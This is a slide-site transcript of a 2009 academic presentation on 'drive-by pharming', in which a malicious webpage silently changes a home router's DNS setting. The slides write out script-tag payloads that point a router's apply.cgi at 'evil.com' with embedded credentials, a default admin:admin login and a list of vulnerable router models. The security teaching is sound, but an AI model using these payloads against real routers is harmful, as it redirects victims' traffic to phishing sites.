s stamm z ramzan and m jakobsson presented by anh le n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Drive-by Pharming PowerPoint Presentation
Download Presentation
Drive-by Pharming

Loading in 2 Seconds...

  share
play fullscreen
1 / 17
karis

Drive-by Pharming - PowerPoint PPT Presentation

92 Views
Download Presentation
Drive-by Pharming
An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. S. Stamm, Z. Ramzan, and M. Jakobsson Presented by Anh Le Drive-by Pharming

  2. Authors Sid Stamm - Indiana University - Google Intern Dr. ZulfikarRamzan - Technical Director of Symantec Security • Prof. Markus Jacobsson • - Indiana University • Principal Scientist • at Palo Alto RC Anh Le - UC Irvine - 2009

  3. Outline • Introduction • Preliminaries and Previous Work • Drive-By Pharming • Demo • New Attacks and Recent Events • Conclusion and Discussion Anh Le - UC Irvine - 2009

  4. 1. Introduction • Motivation: • Total control of home broadband routers • Phishing (by changing DNS setting) • Botnets (by changing firmware) • How: • Attacker sets up an “evil” webpage • Victim visits the evil webpage • Victim’s home router is compromised • No physical proximity required • Enablers: • JavaScript-enabled web browsers • Default password management of the routers Anh Le - UC Irvine - 2009

  5. 2a. Preliminaries • DNS: • Domain Name System What’s IP of yahoo.com? yahoo.com’s IP is 206.190.60.37 Client DNS server (home router) Anh Le - UC Irvine - 2009

  6. 2a. Preliminaries (cont.) • Phishing: • A type of social engineering attack to obtain access credentials • Pharming: • An attack aiming to redirect a website's traffic to another bogus website Anh Le - UC Irvine - 2009

  7. 2b. Previous Work Detecting … … Your internal subnet is10.0.0.0/24! Detecting … … You have a Linksys router, and its IP is 10.0.0.1! Internet • Internal Net Discovery [Kindermann 2003] • Java Applet • Host Scanning [Grossman 2006, SPI Labs 2006] • Java Script • Fingerprint router using default password and image name Anh Le - UC Irvine - 2009

  8. Outline • Introduction • Preliminaries and Previous Work • Drive-By Pharming • Demo • New Attacks and Recent Events • Conclusion and Discussion Anh Le - UC Irvine - 2009

  9. 3. Drive-By Pharming Internet DNS Setting Changed! Anh Le - UC Irvine - 2009

  10. 3. Drive-By Pharming • How is it possible? • HTTP Get Configuration • Off-site script inclusion • How about password-protected? http://10.0.0.1/apply.cgi?dns=new-dns-server.com <scriptsrc=“http://10.0.0.1/apply.cgi?dns=evil.com”></script> <scriptsrc=“http://usr:pwd@10.0.0.1/ apply.cgi?dns=evil.com”></script> Anh Le - UC Irvine - 2009

  11. 3. Drive-By Pharming (cont.) • Assumptions: • JavaScript-Enabled Web Browser • Default Password Management • Vulnerable Routers: • Netgear WGR614 • D-Link DI-524 • Linksys WRT54G • Cisco 806, 826, … • … Anh Le - UC Irvine - 2009

  12. 3. Drive-By Pharming (cont.) • Verizon[Modem + Router]MI424-WR • admin:admin Anh Le - UC Irvine - 2009

  13. 4. Demo Anh Le - UC Irvine - 2009

  14. Outline • Introduction • Preliminaries and Previous Work • Drive-By Pharming • Demo • New Attacks and Recent Events • Conclusion and Discussion Anh Le - UC Irvine - 2009

  15. 5. New Attacks and Recent Events • New Attacks: • Growing Zombies/Botnets • By installing evil firmware • Viral Spread • Router auto-recruits routers • Recent Events: • Kaminsky DNS Vulnerability (July 2008) • cache poisoning attacks on anynameserver! • Router Botnets (March 2009!) Anh Le - UC Irvine - 2009

  16. 5. Conclusion and Discussion • Routers with default password management are easily compromised • Browsers as conduits of attacks to internal network • Army of router botnets Anh Le - UC Irvine - 2009

  17. Anh Le - UC Irvine - 2009